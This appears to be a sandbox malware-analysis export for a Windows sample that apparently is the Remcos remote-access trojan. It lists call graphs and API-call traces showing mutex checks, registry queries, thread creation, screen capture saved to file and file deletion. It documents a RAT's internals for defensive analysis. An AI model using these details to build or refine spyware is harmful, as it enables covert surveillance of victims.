??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 
?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4916->4917 4917->4909 4917->4918 4918->4901 4918->4917 4920 4027a1 4919->4920 4921 402814 4919->4921 4920->4921 4922 4027ae 7 API calls 4920->4922 4921->4885 4922->4921 4924 40237a 4923->4924 4924->4909 4924->4910 4926 40e194 4925->4926 4927 40e17a 4925->4927 4928 401289 6 API calls 4926->4928 4929 40e185 GdiplusStartup 4927->4929 4930 40e1a2 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4928->4930 4929->4926 4931 401289 6 API calls 4930->4931 4932 40e1b4 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4931->4932 4933 40712f 37 API calls 4932->4933 4934 40e1c8 6 API calls 4933->4934 4943 40e220 4934->4943 4935 401289 6 API calls 4937 40e22f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4935->4937 4936 40e267 10 API calls 4939 401289 6 API calls 4936->4939 4940 40f4a3 43 API calls 4937->4940 4938 401289 6 API calls 4941 40e3c4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 4938->4941 4942 40e30a ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4939->4942 4940->4943 4944 40e3da Sleep 4941->4944 4945 40e317 6 API calls 4942->4945 4946 40e36e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4942->4946 4943->4935 4943->4936 4943->4938 4947 40e24c Sleep 4943->4947 4953 401289 6 API calls 4943->4953 4944->4943 4948 40e381 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4945->4948 4946->4948 4947->4943 4949 40f44c 3 API calls 4948->4949 4950 40e390 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4949->4950 4965 40decb ??2@YAPAXI mbstowcs 4950->4965 4954 40e3eb ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 4953->4954 4954->4944 4957 401289 6 API calls 4956->4957 4958 4018e0 8 API calls 4957->4958 5036 40f978 RegisterClassExA 
4959->5036 4962 40f951 GetMessageA 4963 40f974 4962->4963 4964 40f957 TranslateMessage DispatchMessageA 4962->4964 4964->4962 4998 40d71e CreateDCA CreateCompatibleDC GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 4965->4998 4968 40df14 LoadLibraryA GetProcAddress 4969 40df2d ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4968->4969 4970 40df47 4969->4970 5011 40dd42 4970->5011 4976 40df6f 5028 40fc2c free 4976->5028 4978 40df75 4979 401289 6 API calls 4978->4979 4980 40df82 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4979->4980 4981 40df93 ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4980->4981 4982 40e11d 4980->4982 4983 40e111 ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4981->4983 4984 40dfba ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2 4981->4984 5033 40dda1 GdipDisposeImage 4982->5033 4983->4982 5029 405288 4984->5029 4987 40e125 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4987->4943 4988 40dfdc ??2@YAPAXI ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@ 5030 405288 4988->5030 4990 40dffb ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@ DeleteFileA ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4991 40e040 4990->4991 4992 402a2a 4 API calls 4991->4992 4993 40e059 4992->4993 5031 40fc2c free 4993->5031 4995 40e05f 8 API calls 5032 405288 4995->5032 4997 40e0d0 6 API calls 4997->4983 4999 40d775 SelectObject 4998->4999 5009 40d76d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4998->5009 5001 40d78b StretchBlt 4999->5001 4999->5009 5002 40d7b2 GetObjectA 5001->5002 5001->5009 5004 40d7cd 
LocalAlloc 5002->5004 5002->5009 5003 40d991 5003->4968 5003->4969 5006 40d848 GlobalAlloc 5004->5006 5007 40d83e 5004->5007 5008 40d891 GetDIBits 5006->5008 5006->5009 5007->5006 5008->5009 5010 40d8bd 15 API calls 5008->5010 5009->5003 5010->5003 5012 40dd66 GdipLoadImageFromStream 5011->5012 5013 40dd5f GdipLoadImageFromStreamICM 5011->5013 5014 40dd6b 5012->5014 5013->5014 5015 40d999 5014->5015 5034 40da32 GdipGetImageEncodersSize 5015->5034 5017 40d9b6 5018 40d9bd malloc 5017->5018 5020 40d9cd 5017->5020 5019 40d9d2 5018->5019 5018->5020 5035 40da42 GdipGetImageEncoders 5019->5035 5026 40e133 GdipSaveImageToFile 5020->5026 5022 40d9de 5023 40da0b free 5022->5023 5025 40d9ec wcscmp 5022->5025 5023->5020 5025->5022 5025->5023 5027 40e152 5026->5027 5027->4976 5028->4978 5029->4988 5030->4990 5031->4995 5032->4997 5033->4987 5034->5017 5035->5022 5037 40f8e4 ExtractIconA lstrcpynA Shell_NotifyIconA 5036->5037 5038 40f9c9 CreateWindowExA 5036->5038 5037->4962 5038->5037 5039 40f9e3 GetLastError 5038->5039 5039->5037

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 407452-40750e call 407c53 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40efb5 call 408510 call 401b3c call 401289 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 OpenMutexA 11 407510-407516 WaitForSingleObject 0->11 12 40751c-40753d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408e97 0->12 11->12 15 40755a-40758e call 401289 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateMutexA GetLastError 12->15 16 40753f-407557 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409132 12->16 21 407590-407593 15->21 22 407598-4075ec call 407d38 call 401000 GetModuleFileNameA call 408ef1 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 40f0b5 15->22 16->15 23 407c41-407c50 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 21->23 32 4075f5 22->32 33 4075ee-4075f3 22->33 34 4075fa-407609 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 32->34 33->34 35 407612-407615 34->35 36 40760b-40760d 34->36 37 407683-407697 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 35->37 38 407617-40762b call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 35->38 36->35 45 407699 call 4084b8 37->45 46 40769e-40775b call 401289 
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 37->46 38->37 44 40762d-407633 38->44 44->37 47 407635-40763b 44->47 45->46 72 4077c3-4077c6 46->72 73 40775d-40777a call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 46->73 50 40765c-40767c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408e4e 47->50 51 40763d-407653 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 47->51 50->37 61 40767e call 402a78 50->61 51->37 53 407655-40765a call 402b5b 51->53 53->37 61->37 75 4077cc-4077e0 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 72->75 76 40795e-407984 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 72->76 73->72 80 40777c-4077bd call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 73->80 86 4077e2-407857 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 
?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40650d 75->86 87 407859-407865 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 75->87 83 407986-407988 76->83 84 40798a-40798c 76->84 80->72 88 40798f-40799f call 40faed CreateThread 83->88 89 4079a1-4079df call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z call 401289 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 84->89 90 40798e 84->90 92 40786b-40788b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408e4e 86->92 87->92 88->89 117 4079e1-407a20 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 89->117 118 407a25-407abf call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateDirectoryA call 401289 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z 
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 89->118 90->88 107 407891-407919 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ??2@YAPAXI@Z ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4090d0 call 40fc2c 92->107 108 40791b-407934 call 401289 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 92->108 107->108 108->76 122 407936-407955 call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 407e0b 108->122 145 407ac2-407ad2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 117->145 118->145 122->76 144 407957 122->144 144->76 148 407af2-407b06 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 403774 145->148 149 407ad4-407ad5 145->149 152 407b0b-407b1f call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 148->152 151 407ad7-407af0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 4037d4 149->151 149->152 151->152 157 407b21-407b2b CreateThread 152->157 158 407b2d-407b41 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 152->158 157->158 161 407b50-407b64 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 158->161 162 407b43-407b4e CreateThread 158->162 165 407b66-407bb7 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 
40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ CreateThread 161->165 166 407bb9-407bcd call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 161->166 162->161 165->166 172 407c08-407c2e call 40e549 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 166->172 173 407bcf-407c07 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 405f6c 166->173 180 407c30 172->180 181 407c33-407c3b call 409e73 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 172->181 173->172 180->181 181->23
                              APIs
                                • Part of subcall function 00407C53: malloc.MSVCRT ref: 00407C76
                                • Part of subcall function 00407C53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00407CA2
                                • Part of subcall function 00407C53: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407CAE
                                • Part of subcall function 00407C53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407CB7
                                • Part of subcall function 00407C53: malloc.MSVCRT ref: 00407CC8
                                • Part of subcall function 00407C53: free.MSVCRT(?,?,?,?,dt@,00000000), ref: 00407D13
                                • Part of subcall function 00407C53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407D21
                                • Part of subcall function 00407C53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407D2A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00407473
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407482
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Software\,00000000,0000000E,004108CC,00000000), ref: 004074C1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,0000000E,004108CC,00000000), ref: 004074CE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,004108CC,00000000), ref: 004074DE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004108CC,00000000), ref: 004074E7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004108CC,00000000), ref: 004074F0
                              • OpenMutexA.KERNEL32(00100000,00000000,Remcos_Mutex_Inj), ref: 00407506
                              • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,004108CC,00000000), ref: 00407516
                                • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D54
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D72
                                • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D86
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DA3
                                • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DB7
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DCC
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DDC
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DF0
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407E00
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00415978,00000000,00415940,004075A2,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401013
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040103B
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401060
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401085
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010AA
                                • Part of subcall function 00401000: CreateThread.KERNEL32(00000000,00000000,004011F8,00000000,00000000,00000000), ref: 004010C0
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010D1
                                • Part of subcall function 00401000: CreateThread.KERNEL32(00000000,00000000,00401216,00000000,00000000,00000000), ref: 004010E5
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,004108CC,00000000), ref: 00407527
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407546
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040756B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407573
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040757D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407583
                              • GetModuleFileNameA.KERNEL32(00000000,0041580C,00000104,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075AD
                                • Part of subcall function 00408EF1: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                • Part of subcall function 00408EF1: RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075D6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075DF
                                • Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075FC
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407622
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00410CC4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407645
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407787
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407799
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077B4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004077BD
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004077D7
